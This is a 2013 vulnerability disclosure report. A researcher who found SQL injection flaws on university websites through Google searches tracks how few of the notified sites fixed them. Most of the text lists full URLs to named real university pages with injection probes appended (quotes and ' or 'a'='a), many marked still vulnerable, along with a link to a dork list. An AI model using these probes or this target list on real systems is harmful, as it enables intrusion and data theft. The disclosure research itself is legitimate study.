Vulnerabilities at Universities--84% Don't Care

Summary

Using Google searches, I found 55 serious vulnerabilities in .EDU domains. I notified them all, and 9 of them fixed the problems. This is consistent with my previous "cold calls" projects in which approximately 20% of companies notified of vulnerabilities ever did anything about it.

I don't know for sure why this is, but my working hypothesis is that 80% of vulnerability disclosures to to an email inbox that nobody reads, or that is only read by someone who does not understand security and discards them.

Results

SitesProblemsRemediations
1-108 SQLiNone on 11-142 fixed on 12-4
11-209 SQLi1 response, None fixed on 11-143 fixed 12-4
21-308 SQLi, 2 hosting malwareNo responses, 3 fixed on 11-14 *5 fixed on 12-4-13
31-409 SQLiNo responses, 2 fixed on 11-142 fixed 12-4
41-5010 SQLi3 fixed on 11-144 fixed 12-4
51-608 SQLi2 fixed on 11-143 fixed 12-4
611 SQLiNone on 11-14none on 12-4
----------------------------------- ------------------------------------------ ------------------------------------------
Totals53 SQLi, 2 hosting malware10 SQLi fixed on 11-14-13
(3 days, 19%)
19 fixed 12-4-13
(23 days, 36%)

* (changed from an incorrect 2 on 12-4-13)

I tested the vulnerable links at 12-4-13 7:16 am:
Fixed: 5, 6, 15, 18, 20, 28, 29, 30, 35, 40, 45, 58: 12
Changed from Fixed to Vuln: 25, 32, 33: 3

Vulnerability Details

The Google dorks I used were similar to those listed here, with "inurl:edu" added to them:

https://www.facebook.com/DzMafialAnonymousDz/posts/519935964720997

1 c http://www.bme.jhu.edu/people/primary.php?id=915'
2 c http://scriptures.byu.edu/gettalk.php?ID=1698'

4 c http://www.montserrat.edu/news/press-release-item.php?id=107'
5 FIXED c Resp Fixed http://www.wallawalla.edu/index.php?id=13900&catID=30'


6 FIXED c Removed http://kiemlicz.med.virginia.edu/mcsg7/crystal_harvests/index/page:0/target_id:017890'/sort:staff_id/direction:asc
7 c http://cxc.harvard.edu/XATLAS/preview_obs.php?target_id=9'
8 c http://musicweb.ucsd.edu/ugrad/ugrad-pages.php?i=108'

10 c http://www.mbc.edu/career/employment/detail.php?id=493'


11 c http://library.uwb.edu/arttour/detail.php?artistID=4'
12 c Resp Not Fixed 11-12-13; not fixed 11-14-13 http://cwise.ncsu.edu/research/theme.php?id=2'
13 c http://www.nysipm.cornell.edu/news/nysipm_rss_article.php?newsId=138'
14 c http://www.engl.polyu.edu.hk/ENGL_PROG.php?newsid=53'
15 FIXED c Fixed 12-4-13 http://www.creol.ucf.edu/NewsEvents/NewsDetail.aspx?NewsID=426'


16 c http://www.ices.cmu.edu/newsitem.asp?NewsID=781'

18 FIXED c Fixed 12-4-13 http://www.monmouth.edu/newswire/default.aspx?newsID=5886'
19 c http://www3.nd.edu/~ois/news/article.php?newsid=12'%20or%20'a'='a
20 FIXED c Fixed 12-4-13 http://m.morrisville.edu/news/newsinfo.aspx?newsid=16213'&page=0&set=BIZ


21 c http://www.highland.edu/news_events/announcements.asp?newsid=352'
22 c Resp, gift, but not fixed http://www.exploratorium.edu/imaging-station/gallery.php?Section=Introduction'
23 c http://jenny.tfrec.wsu.edu/opm/gallery.php?pn=165'
24 FIXED F Resp, already knew, Fixed http://www.cvn.columbia.edu/review.php?course=IEOR%20E4003&sem=A13'
25 F Vuln on 12-4-13 http://www.arts.cuhk.edu.hk/~lal/index.php?id=9'


26 FIXED F http://som.adzu.edu.ph/newsupdates/index.php?id=1'
27 c http://www.auburn.edu/oit/news/article.php?id=255'
28 FIXED c Fixed 12-4-13 http://dateline.ua.edu/viagra-online-100mg/
29 FIXED h Fixed 12-4-13 http://my.mcm.edu/?Taki=ordering-soft-viagra-online-100mg
30 FIXED h Fixed 12-4-13 http://blogs.chatham.edu/wp-content.bak/plugins/social/OTAwOQ-3D-3D.asp


31 c http://www.umass.edu/ofr/news.php?act=sendNews&id=61'
32 F Vuln on 12-4-13 http://www.bulsu.edu.ph/news.php?id=3'
33 F Vuln on 12-4-13 http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12'
34 c http://events.muohio.edu/event.php?event_id=190427'&sid=11&cid=362&view=cmonth&day=20120125&dayofweek=
35 FIXED c Resp, not fixed on 11-14, fixed on 12-4-13 http://www.setonhill.edu/ncche/event.php?id=11'


36 c http://cepa.maxwell.syr.edu/cdb/event.php?id=44'&flyer=1
37 c http://www.fsl.orst.edu/lemma/main.php?project=imap&id=studyAreas'

39 c http://www.iol.umd.edu/People/person.php?id=tweyrauch'
40 FIXED c Fixed on 12-4-13 http://schultz-appel.missouri.edu/person.php?id=110'&nid=9&PersonName=Heidi++Appel


41 FIXED F Resp Removed http://student.santarosa.edu/~dkrempel/2010fall/cs5513/assn17/detail.php?id=0000025'
42 c http://www1.chaffey.edu/faq/detail.php?faq_id=2'
43 c https://myptc.pulaskitech.edu/acp/StudentEvals/displayCourses.php?StudentID=@@HostID'
44 c http://www2.tesc.edu/course.php?CourseCode=HIS-101'%20or%20'a'='a
45 FIXED c Fixed 12-4-13 http://wwwdata.forestry.oregonstate.edu/forestry/pubs/fmc/slc/courses/course.php?num=FOR441'


46 FIXED F Fixed http://online.darton.edu/degrees/course.php?width=858&height=500&cid=19'
47 c http://www.universitypress.andrews.edu/catalog.php?key=213'
48 c http://storyboard.eden.edu/kiosk/alumni-class.php?slug=1930'
49 FIXED F Removed https://www.egr.msu.edu/chems/class.php?page=29'
50 c http://personal.frostburg.edu/mamorgan0/cosc625/api/class.php?class=Room'


51 FIXED F Fixed http://www.nc-climate.ncsu.edu/climate/groundhog/record.php?year=2013'
52 c http://www.stat.iastate.edu/directory/personal.php?id=mshelley'

55 c Not fixed 11-12-13, still vuln 12-4-13 http://students.ncsu.edu/top54/list.php?id=1'


56 c http://www.rmrs.nau.edu/mistletoe/dyn/results.php?keyw=49'&reftype=keyword
57 FIXED F Resp Fixed http://lib.colostate.edu/wildlife/results.php?q=%22Aardwolf%22&field=fulltopicStr'
58 FIXED c Fixed 12-4-13 http://www.waterbase.glwi.uwm.edu/mmsd/one-survey.php?survey_id=3'
59 c http://flrcvideos.unc.edu/video.php?link=531'
60 c http://www.indstate.edu/news/video.php?videoid=566'


61 c http://www.northlandcollege.edu/services/placement/jobs/job.php?job_id=2327'

Notes:
c: SQLi vuln
F: Fixed
h: Hosting malware

Ethics

I originally planned to wait a week before disclosing these URLs, but the timeline of response shows, as I expected, that the few universities that care fixed them immediately, and the rate of fixing has already fallen to near-zero. Further delay seems pointless.

Changelog

Notifications sent between 8:30 and 10:30 am 11-11-13 (Monday)
4:12 pm 11-11 6 friendly responses, one with a gift
7 am 11-12, one more friendly response, 2 fixed
3 fixed, 3 removed 5 pm 11-12-13
One more fixed (# 5) 11-14-13
Posted 10:14 am 11-14-13 Updated 12-4-13 7:51 am